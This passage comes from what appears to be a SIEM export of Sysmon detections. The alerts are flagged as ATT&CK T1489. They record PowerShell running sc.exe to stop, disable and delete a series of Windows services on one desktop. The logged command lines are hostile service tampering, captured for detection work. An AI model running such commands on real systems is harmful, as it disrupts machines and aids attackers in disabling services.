{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.537"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-0010c7c63000}"",""processId"":""6676"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApSrvs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.500",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.419 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-001031c43000} +ProcessId: 7504 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ALGM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.422637100Z"",""eventRecordID"":""3862"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.419\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-001031c43000}\r\nProcessId: 7504\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.419"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-001031c43000}"",""processId"":""7504"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.422",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.333 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-0010a5c13000} +ProcessId: 7732 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WifiService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WifiService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.335676600Z"",""eventRecordID"":""3859"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.333\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-0010a5c13000}\r\nProcessId: 7732\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WifiService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.333"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-0010a5c13000}"",""processId"":""7732"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WifiService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.396",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.310 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-0010b5c03000} +ProcessId: 6072 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WifiService Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WifiService Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.313253400Z"",""eventRecordID"":""3858"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.310\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-0010b5c03000}\r\nProcessId: 6072\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WifiService Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.310"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-0010b5c03000}"",""processId"":""6072"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WifiService Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.347",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.266 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-0010debe3000} +ProcessId: 5888 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SRDSL +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.268466600Z"",""eventRecordID"":""3856"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.266\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-0010debe3000}\r\nProcessId: 5888\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.266"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-0010debe3000}"",""processId"":""5888"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SRDSL"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.281",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.181 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-001016bc3000} +ProcessId: 5048 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop MpeSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.184515500Z"",""eventRecordID"":""3853"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.181\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-001016bc3000}\r\nProcessId: 5048\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.181"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-001016bc3000}"",""processId"":""5048"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop MpeSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.252",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.118 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-001020ba3000} +ProcessId: 6384 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete IPSECS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete IPSECS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.122013000Z"",""eventRecordID"":""3851"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.118\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-001020ba3000}\r\nProcessId: 6384\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete IPSECS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.118"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-001020ba3000}"",""processId"":""6384"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete IPSECS"",""currentDirectory"":""C:\\\\Users\\\\John 